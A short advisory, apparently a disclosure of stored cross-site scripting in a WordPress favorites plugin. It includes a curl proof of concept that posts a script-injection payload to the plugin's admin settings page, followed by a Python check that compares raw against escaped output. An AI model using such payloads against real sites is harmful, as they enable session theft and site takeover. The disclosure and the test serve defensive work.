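Because certain characters are not filtered, input can be crafted to close the surrounding markup, resulting in XSS.
The PoC is as follows: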
curl 'http://exsample.com/wp-admin/options-general.php?page=add2fav_uid' --data 'add2fav_hidden=Y&add2fav_label_add=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&add2fav_label_rem=Remove+from+Favorites&add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes'
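
The following is an added example, not code from the original post or from the plugin: it decodes the PoC's POST body and checks, field by field, whether the value breaks out of an HTML attribute when echoed raw versus output-encoded. It assumes the settings page echoes each saved label into a value="..." attribute; render_unsafe and render_safe are hypothetical stand-ins for that template.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# POST body of the PoC on this page, joined onto one line.
POC_BODY = (
    "add2fav_hidden=Y&add2fav_label_add="
    "%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E"
    "&add2fav_label_rem=Remove+from+Favorites"
    "&add2fav_label_reg=&add2fav_label_off=%23&Submit=Save+Changes"
)

class TagCollector(HTMLParser):
    """Records every start tag (with attributes) that the HTML parser sees."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def render_unsafe(name, value):
    # Assumed sink (hypothetical): the value is echoed into the attribute as-is.
    return f'<input type="text" name="{name}" value="{value}">'

def render_safe(name, value):
    # Encode for the attribute context; WordPress provides esc_attr() for this.
    return f'<input type="text" name="{name}" value="{escape(value, quote=True)}">'

def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def breaks_out(markup):
    """True if the markup parses to anything other than one <input> element."""
    return [tag for tag, _ in parsed_tags(markup)] != ["input"]

def audit(body, render):
    """Map each form field to whether its rendered markup leaves the attribute."""
    fields = parse_qsl(body, keep_blank_values=True)
    return {name: breaks_out(render(name, value)) for name, value in fields}

if __name__ == "__main__":
    print("raw echo:", audit(POC_BODY, render_unsafe))
    print("encoded :", audit(POC_BODY, render_safe))
```
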